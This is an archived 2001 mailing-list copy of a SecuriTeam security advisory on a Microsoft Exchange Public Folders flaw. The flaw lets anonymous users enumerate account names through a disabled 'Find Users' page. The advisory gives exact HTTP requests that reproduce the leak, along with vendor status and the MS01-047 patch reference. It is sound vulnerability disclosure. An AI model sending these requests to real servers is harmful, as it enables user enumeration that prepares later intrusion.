----- Original Message ----- From: "Aviram Jenik" <aviramat_private> To: <NTBUGTRAQat_private> Sent: Friday, September 07, 2001 11:51 AM Subject: Exchange Public Folders Information Leakage > The following security advisory is sent to the securiteam mailing list, > and > can be found at the SecuriTeam web site: http://www.securiteam.com > > SUMMARY > > Microsoft Exchange Server handles anonymous access to its Public Folders > > insecurely. While administrators may disable the "Find Users" features > to > prevent anonymous users from enumerating existing user names, a security > > flaw in Exchange server allows remote attackers with access to the > exchange server to run "Find Users". > > DETAILS > > Microsoft Exchange's Public Folders options of "Find Users" can be > disabled. This, however, does not prevent the users from directly > accessing the ASP page (fumsg.asp). The link to the "Find Users" will be > > hidden, however it is still possible to programmatically access the > page. > > Steps to recreate: > 1) Contact: > GET /exchange/root.asp?acs=anon HTTP/1.1 > Host: www.example.com > > > 2) Access the redirected page, and resend the issued cookie. > GET /exchange/logonfrm.asp HTTP/1.1 > Host: www.example.com > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN > > > 3) Access the redirected page, and resend the issued cookie. > GET /exchange/root.asp?acs=anon HTTP/1.1 > Host: www.example.com > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN > > > 4) Issue this request to obtain a list of users with the letter 'a' in > their name (e.g. Administrator) > POST /exchange/finduser/fumsg.asp HTTP/1.1 > Host: www.example.com > Accept: */* > Content-Type: application/x-www-form-urlencoded > Content-Length: 44 > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN > > DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO= > > Vendor status: > Microsoft has been contacted on August 4, 2001. A security bulletin was > released on September 7, 2001. > > Solution: > Microsoft has released a patch for this problem. See > <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu > rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for > more information. > > > ADDITIONAL INFORMATION > This security hole was discovered by <mailto:noamrat_private> Noam > Rathaus. > The information has been provided by <mailto:expertsat_private> > SecuriTeam Experts. > > > > ==================== > ==================== > > DISCLAIMER: > The information in this bulletin is provided "AS IS" without warranty of > any > kind. > In no event shall we be liable for any damages whatsoever including > direct, > indirect, incidental, consequential, loss of business profits or special > damages. > > ============================================================================ > Delivery co-sponsored by Trend Micro, Inc. > ============================================================================ > TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE > > If you are worried about email viruses, you need Trend Micro ScanMail for > Exchange. ScanMail is the first antivirus solution that seamlessly > integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail > ensures 100% inbound and outbound email virus scanning and provides remote > software management. Download a FREE 30-day trial copy of ScanMail and find > out why it is the best: > http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000 > ============================================================================
This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 15:55:28 PDT